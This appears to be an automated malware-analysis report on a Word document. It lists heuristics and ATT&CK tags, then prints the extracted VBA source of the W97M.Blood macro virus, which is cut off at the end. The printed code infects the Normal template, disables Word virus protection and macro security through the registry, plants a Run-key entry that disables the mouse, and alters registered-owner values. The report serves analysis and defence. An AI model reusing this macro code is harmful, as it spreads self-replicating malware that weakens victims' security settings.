Verdict: MALICIOUS
Risk Score: 348
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains VBA macros with AutoOpen and Auto_Close subroutines, indicative of malicious intent. The 'Shell()' call within the VBA code strongly suggests the execution of arbitrary commands, likely to download and run a secondary payload. The ClamAV detections further confirm its malicious nature.
Heuristics (8)
- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4325 bytes |

SHA-256: 7131761b551a4b5e74b5a06aa292c3050e78ef00c44ac19ba98687a5a37635ea
Detection (ClamAV): Doc.Trojan.Petman-1
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const marker = "<-this is a marker"
Dim savedocument, savenormaltemplate, dti, nti As Boolean
Dim ad, nt As Object
Dim ourcode As String
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
dti = ad.CodeModule.Find(marker, 1, 1, 10000, 10000)
nti = nt.CodeModule.Find(marker, 1, 1, 10000, 10000)
'If Day(Now()) = 29 Then
' Selection.TypeText "hello,you have been cracked!"
'End If
If dti = True Xor nti = True Then
If dti = True Then
savenormaltemplate = NormalTemplate.Saved
ourcode = ad.CodeModule.Lines(1, ad.CodeModule.countoflines)
For Each Template In tempaltes
Template.VBProject.VBComponents.Item(1).codemoudle.deletelines 1, ad.CodeModule.countoflines
Template.VBProject.VBComponents.Item(1).CodeModule.AddFromString ourcode
Template.VBProject.VBComponents.Item(1).Save
Next Template
nt.codemoudle.deletelines 1, ad.CodeModule.countoflines
nt.CodeModule.AddFromString ourcode
nt.Save
End If
If nti = True Then
savedocument = ActiveDocument.Saved
ourcode = nt.CodeModule.Lines(1, nt.CodeModule.countoflines)
ad.codemoudle.deletelines 1, nt.CodeModule.countoflines
ad.CodeModule.AddFromString ourcode
nt.Save
End If
End If
End Sub
Attribute VB_Name = "Blood"
Sub AutoOpen()
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
win = Environ("windir")
DropFile = win & "\blood.sys"
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") <> "OK" Then
Doc("Blood").Export DropFile
Nor.import DropFile
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") = "OK"
End If
If Doc.Item("Blood").Name <> "Blood" Then
Nor("Blood").Export DropFile
Doc.import DropFile
ActiveDocument.Save
End If
If Day(Now) = 15 Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "BloodMan"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "PetiK Corporation"
End If
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "W97M.Blood.A coded by PetiK (c)2001"
.Heading = "W97M.Blood"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End Sub
Sub ViewVBCode()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "Blood1") = "rundll32 mouse,disable"
MsgBox "Your computer is dead." + vbCr + "Don't stop your machine", vbCritical, "W97M.Blood"
ShowVisualBasicEditor = True
End Sub
Sub AutoClose()
MsgBox "PetiK vous souhaite une très bonne journée", vbExclamation, "W97M.Blood"
Call PetiK
Call Attak
End Sub
Sub PetiK()
On Error Resume Next
win = Environ("windir")
FileSystem.MkDir win & "\Blood"
Open win & "\Blood\TitleBlood.txt" For Output As #1
Print #1, "For the new Macro Virus W97M.Blood by PetiK"
Print #1, ""
Print #1, "Hi " & Application.UserName & ","
Print #1, "How do you do ?"
Print #1, "Your computer is infected by Blood"
Print #1, "It's not a dangerous macro."
Print #1, " B
... (truncated)